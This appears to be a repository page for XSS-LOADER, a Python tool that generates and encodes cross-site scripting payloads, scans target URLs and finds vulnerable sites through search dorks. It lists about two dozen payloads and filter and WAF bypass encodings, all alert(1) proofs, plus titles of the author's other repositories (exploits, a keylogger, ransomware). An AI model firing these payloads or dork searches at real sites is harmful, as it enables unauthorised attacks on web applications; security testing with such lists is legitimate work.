• Stars
    star
    554
  • Rank 80,342 (Top 2 %)
  • Language
    Python
  • License
    Creative Commons ...
  • Created over 4 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Xss Payload Generator ~ Xss Scanner ~ Xss Dork Finder

💎   XSS-LOADER TOOLS   💎

Written by TMRSWRR

Version 1.0.0

All in one tools for XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER

Instagram: TMRSWRR

📷 Screenshots 📷

👇 💌 How to use 💌 👇

How to use

📒 Read Me 📒

  • This tool creates payload for use in xss injection
  • Select default payload tags from parameter or write your payload
  • It makes xss inj. with Xss Scanner parameter
  • It finds vulnerable sites url with Xss Dork Finder parameter

💿 Installation 💿

Installation with requirements.txt

git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

Usage

python3 payloader.py

🗃️ Features 🗃️

*Basic Payload

Sets default parameter to :<script>alert(1)</script>

*Div Payload

Sets default parameter to :<div onpointerover='alert(1)'>MOVE HERE</div

*Img Payload

Sets default parameter to :<img src=x onerror=alert('1');>

*Body Payload

Sets default parameter to :<body ontouchstart=alert(1)>

*Svg Payload

Sets default parameter to :<svg onload=alert('1')>

*Enter Your Payload

Encodes payload writed by user

*Payload Generator Parameter

Encodes payload on selected tag

* |   1.  UPPER CASE---->  <SCRIPT>ALERT(1)</SCRIPT>              
* |   2.  UPPER AND LOWER CASE----> <ScRiPt>aleRt(1)</ScRiPt>   
* |   3.  URL ENCODE ----->   %3Cscript%3Ealert%281%29%3C%2Fscript%3E           
* |   4.  HTML ENTITY ENCODE----->  &lt;script&gt;alert(1)&lt;/script&gt; 
* |   5.  SPLIT PAYLOAD ----->  <scri</script>pt>>alert(1)</scri</script>pt>>       
* |   6.  HEX ENCODE ----->  3c7363726970743e616c6572742831293c2f7363726970743e       
* |   7.  UTF-16 ENCODE -----> Encode payload to utf-16 format.   
* |   8.  UTF-32 ENCODE----->  Encode payload to utf-32 format.          
* |   9.  DELETE TAG -----> ";alert('XSS');//            
* |  10.  UNICODE ENCODE----->    %uff1cscript%uff1ealert(1)%uff1c/script%uff1e         
* |  11.  US-ASCII ENCODE ----->  ¼script¾alert(1)¼/script¾      
* |  12.  BASE64 ENCODE ----->   PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==          
* |  13.  UTF-7 ENCODE ----->   +ADw-script+AD4-alert(1)+ADw-/script+AD4-           
* |  14.  PARENTHESIS BYPASS ----->  <script>alert`1`</script>   
* |  15.  UTF-8 ENCODE ----->  %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE          
* |  16.  TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* |  17.  SCRIPT BREAKOUT----->  </script><script>alert(1)</script>
* |  18.  FILE UPLOAD PAYLOAD-----> "><script>alert(1)</script>.gif
* |  19.  INSIDE COMMENTS BYPASS-----> <!--><script>alert(1)</script>-->
* |  20.  MUTATION PAYLOAD-----> <noscript><p title="</noscript><script>alert(1)</script>">
* |  21.  MALFORMED IMG-----> <IMG """><script>alert(1)</script>">
* |  22.  SPACE BYPASS-----> <img^Lsrc=x^Lonerror=alert('1');>
* |  23.  DOWNLEVEL-HIDDEN BLOCK-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* |  24.  WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* |  25.  CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload List
* |  26.  POLYGLOT PAYLOADS-----> Show Polyglot Bypass Payload List
* |  27.  ALERT PAYLOADS-----> Show Alert Payload List
* |  28.  ALL CREATE PAYLOAD-----> Show Create All Payloads
* |  29.  GO BACK MAIN MENU
* |  30.  EXIT

*Xss Scanner

Initially you'll need to enter url of target Please enter the url like this example==>e.g target -----> http://target.com/index.php?name= Selected for scanning payload list

  • BASIC PAYLOAD LIST ==> Payload list consisting of script tag
  • DIV PAYLOAD LIST ==> Payload list consisting of div tag
  • IMG PAYLOAD LIST ==> Payload list consisting of img tag
  • BODY PAYLOAD LIST ==> Payload list consisting of body tag
  • SVG PAYLOAD LIST ==> Payload list consisting of svg tag
  • MIXED PAYLOAD LIST ==> Payload list consisting of all tag
  • ENTER FILE PATH ==> Payload list determined by the user ,Please enter the url like this example..! (e.g. path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

Results will be added in "vulnpayload.txt" after scanning.

*Xss Dork Finder

First enter the dork for searching: e.g---->inurl:"search.php?q=" Results will be saved in "dork.txt" after scanning.

Known Issues

Fixed:

  • Unicode errors

  • Module errors

Important:

If you want to use tool for python3 installed on Windows download below link:

https://github.com/capture0x/XSS-LOADER-for-WINDOWS

Bugs and enhancements

For bug reports or enhancements, please open an issue here.

Copyright 2020

More Repositories

1

LFI-FINDER

LFI-FINDER is an open-source tool available on GitHub that focuses on detecting Local File Inclusion (LFI) vulnerabilities
Python
282
star
2

Lfi-Space

Lfi Scan Tool
Python
102
star
3

XSHOCK

XSHOCK Shellshock Exploit
Python
86
star
4

cypher

#crypto #cipher #encode #decode #hash
Python
51
star
5

XSS-FINDER

#xss #xssfinder #xss-scanner #bugbounty #hacktool
Python
37
star
6

XCTR-Hacking-Tools

XCTR Hacking Tools
Python
35
star
7

EvilEyes-Extract

Python
28
star
8

CVE-FIND

Cve and Exploit Finder on the target
Python
25
star
9

web-scanner

Web Scanner Tool
Python
23
star
10

mailExtractor

Mail extractor with your dork
Python
22
star
11

SSTI-FINDER

This tool is designed to detect and identify Server-Side Template Injection (SSTI) vulnerabilities in web applications
Python
9
star
12

My-Exploits

My Exploit
9
star
13

Keylogger-for-linux

Simple Keylogger
Python
8
star
14

watch-coins

Python
7
star
15

RedRoseRansomware

Python
5
star
16

GOOGLE-LINK-COLLECTOR

google-scraping ~ link-collector ~ find-links
Python
5
star
17

Total-CMS-EXPLOIT

Total CMS 1.7.4 Shell Upload
Python
4
star
18

Magento-ver.-2.4.6

Magento ver. 2.4.6 - XSLT Server Side Injection
Python
3
star
19

Phoenix

CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)
Python
2
star
20

My-CVE

My-CVE
2
star
21

CMSMadeSimple2

CMS Made Simple Version: 2.2.19 - SSTI
2
star
22

CMSMadeSimple

1
star
23

capture0x

1
star
24

Dork-Scan

Dork scanning, also known as Google Dorking, involves using advanced search queries to discover sensitive or vulnerable information exposed on the internet. These queries, known as "dorks," are crafted to pinpoint specific information on search engines like Google.
Python
1
star